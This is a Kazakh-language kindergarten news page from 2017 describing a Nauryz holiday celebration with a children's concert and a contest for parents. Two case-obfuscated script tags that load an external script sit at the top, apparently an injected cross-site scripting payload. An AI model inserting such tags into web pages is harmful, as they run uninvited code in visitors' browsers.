<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.03.2017

17- наурыз күні "Балдаурен" шағын орталығында 22- наурыз- "Ұлыстың Ұлы күні" мерекесіне арналған "Наурыз- думан" атты ертеңгілік өтті.

Топтың іші мерекеге сай безендірілді. Мерекелік ертеңгілік бүлдіршіндердің шағын концерттік бағдарламасымен басталып, ата-аналардың қатыстырылуымен, сайыс ретінде жалғасты. Сайыс бес кезеңнен тұрды. Ата-аналар түсті стикерлер арқылы екі топқа бөлінді. Топтың атауын бірінші кезеңде өздері "Қызғалдақ", "Сарғалдақ"- деп, таныстырды; Екінші кезеңінде әр топ өз өнерлерін көрсетті; Үшінші "Сыр сандық" кезеңінде сандықшаның ішінен бірнеше қазақтың ұлттық салт-дәстүріне байланысты сұрақтар мен тапсырмалар алып орындады; Төртінші "Сыйлық" кезеңінде қатысушылар бір-біріне ым-ишара көрсетумен сыйлықтар ұсынды. Ертеңгілік соңында ата-аналар дастарқан жайып, бүлдіршіндерімізге ұлттық тағамнан дәм татқызды.

Просмотров: 821


Пікір қосу



Деректерді қолтаңбаға қосу